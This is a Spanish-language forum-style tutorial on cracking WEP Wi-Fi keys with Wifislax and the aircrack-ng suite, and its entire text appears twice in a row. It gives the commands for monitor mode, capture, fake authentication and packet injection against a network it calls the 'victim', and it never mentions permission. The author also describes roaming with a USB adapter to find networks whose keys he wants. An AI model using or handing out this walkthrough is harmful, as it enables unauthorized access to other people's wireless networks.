Kalibula
Nuev@ Applesan@
COMO SACAR CLAVES WEP
Para qué sirve la auditoria wireless?
Para inyectar paquetes a un punto de acceso y así poder obtener la clave WEP de los mismos.
Este pequeño manual es para rtl-8187
Sí, si sirve.
Todas las tarjetas wlan son compatibles?
No, no todas sirven para inyección, te tocará buscar alguna que lo sea.
Empezemos
Lo que necesitamos:
- Wifislax 3.1
- PC con tarjeta de red inalámbrica compatible
- 10 mins de tu tiempo y un poco de paciencia
- Conocer la dirección MAC de tu wlan.
- Pluma y papel.
Procedimiento:
Después de bajar el iso lo queman con el Nero, así les quedara un bonito live cd de linux.
(Ya deberían saber como se queman los iso)
Ahora ya con nuestro disco de wifislax lo insertamos en la pc e iniciamos desde el cd-rom, después de unos minutos y de una o dos opciones que te aparecen, seguir unas cuantas indicaciones te loggeas e inicias el entorno gráfico (Es muy fácil por eso no doy detalles).
Ya en el wifislax le das en el icono del escritorio "Shell" y te abre una ventana parecida al MS-DOS a la cual le llamaremos "Consola" de ahora en adelante.
Ya en la empezaremos checando las tarjetas wlan con el siguiente comando:
iwconfig
Te aparecen las tarjetas que tienes instaladas en el sistema, entre ellas la que utilizarás, yo utilizo
una alfa network de 500mw y me basaré en ella.
Una vez identificada tu tarjeta se procede a correr el modo monitor con el siguiente comando:
airmon-ng start wlan0 6
Atención: Con este comando se inicia el modo monitor en el canal 6, si deseas utilizar otro canal para detectar otras redes puedes sustituir el 6 por cualquier otro número.
Después de activado el modo monitor empezaremos a detectar redes en este caso en el canal 6.
airodump-ng -w aaaa -c6 wlan0 (Aquí mismo sustituyes -c6 por el canal que tú quieras)
(El aaaa es un nombre de archivo elegido por tí, se puede llamar hola si tú quieres)
Escoges alguna red con encriptación WEP, abres una nueva consola y escribes lo siguiente:
aireplay-ng -1 30 -e XXXX -a MACV -h MACC wlan0
Ahora explico el comando:
XXXX - Aquí va el ESSID de tu victima
MACV - Aquí va la dirección MAC de tu víctima
MACC - Aquí debes introducir la dirección MAC de tu wlan.
Quedaría más o menos así:
aireplay-ng -1 30 -e INFINITUMXXX -a 00:00:00:00:00 -h 00:00:00:01 wlan0
Con esto tu tarjeta quedará asociada con el punto de acceso víctima
Ahora empezaremos a inyectar paquetes usando el siguiente comando:
aireplay-ng -3 -x600 -b MACV -h MACC wlan0
(En este momento ya debes saber donde vas a sustituir y con que)
Quedaría más o menos así:
aireplay-ng -3 -x600 -b 00:00:00:00:00 -h 00:00:00:00:01 wlan0
Después de esto los paquetes empezarán a ser enviados.
Después de sobrepasados los 100,000 paquetes enviados se procede a obtener la clave:
Abres una nueva consola y escribes lo siguiente:
aircrack-ptw aaaa-01.cap (Aquí se utiliza el nombre de archivo que especificamos casi al principio al
correr el airodump más el -01 o cualquier otro número -02, -03 etc...)
Apuntas la clave WEP y listo.
yo use un wifi usb el cual me da movilidad para buscar la señal que deseo sacar la clave
y tambien use el netstumbles para saber la intencidad de la señal
Para qué sirve la auditoria wireless?
Para inyectar paquetes a un punto de acceso y así poder obtener la clave WEP de los mismos.
Este pequeño manual es para rtl-8187
Sí, si sirve.
Todas las tarjetas wlan son compatibles?
No, no todas sirven para inyección, te tocará buscar alguna que lo sea.
Empezemos
Lo que necesitamos:
- Wifislax 3.1
- PC con tarjeta de red inalámbrica compatible
- 10 mins de tu tiempo y un poco de paciencia
- Conocer la dirección MAC de tu wlan.
- Pluma y papel.
Procedimiento:
Después de bajar el iso lo queman con el Nero, así les quedara un bonito live cd de linux.
(Ya deberían saber como se queman los iso)
Ahora ya con nuestro disco de wifislax lo insertamos en la pc e iniciamos desde el cd-rom, después de unos minutos y de una o dos opciones que te aparecen, seguir unas cuantas indicaciones te loggeas e inicias el entorno gráfico (Es muy fácil por eso no doy detalles).
Ya en el wifislax le das en el icono del escritorio "Shell" y te abre una ventana parecida al MS-DOS a la cual le llamaremos "Consola" de ahora en adelante.
Ya en la empezaremos checando las tarjetas wlan con el siguiente comando:
iwconfig
Te aparecen las tarjetas que tienes instaladas en el sistema, entre ellas la que utilizarás, yo utilizo
una alfa network de 500mw y me basaré en ella.
Una vez identificada tu tarjeta se procede a correr el modo monitor con el siguiente comando:
airmon-ng start wlan0 6
Atención: Con este comando se inicia el modo monitor en el canal 6, si deseas utilizar otro canal para detectar otras redes puedes sustituir el 6 por cualquier otro número.
Después de activado el modo monitor empezaremos a detectar redes en este caso en el canal 6.
airodump-ng -w aaaa -c6 wlan0 (Aquí mismo sustituyes -c6 por el canal que tú quieras)
(El aaaa es un nombre de archivo elegido por tí, se puede llamar hola si tú quieres)
Escoges alguna red con encriptación WEP, abres una nueva consola y escribes lo siguiente:
aireplay-ng -1 30 -e XXXX -a MACV -h MACC wlan0
Ahora explico el comando:
XXXX - Aquí va el ESSID de tu victima
MACV - Aquí va la dirección MAC de tu víctima
MACC - Aquí debes introducir la dirección MAC de tu wlan.
Quedaría más o menos así:
aireplay-ng -1 30 -e INFINITUMXXX -a 00:00:00:00:00 -h 00:00:00:01 wlan0
Con esto tu tarjeta quedará asociada con el punto de acceso víctima
Ahora empezaremos a inyectar paquetes usando el siguiente comando:
aireplay-ng -3 -x600 -b MACV -h MACC wlan0
(En este momento ya debes saber donde vas a sustituir y con que)
Quedaría más o menos así:
aireplay-ng -3 -x600 -b 00:00:00:00:00 -h 00:00:00:00:01 wlan0
Después de esto los paquetes empezarán a ser enviados.
Después de sobrepasados los 100,000 paquetes enviados se procede a obtener la clave:
Abres una nueva consola y escribes lo siguiente:
aircrack-ptw aaaa-01.cap (Aquí se utiliza el nombre de archivo que especificamos casi al principio al
correr el airodump más el -01 o cualquier otro número -02, -03 etc...)
Apuntas la clave WEP y listo.
yo use un wifi usb el cual me da movilidad para buscar la señal que deseo sacar la clave
y tambien use el netstumbles para saber la intencidad de la señal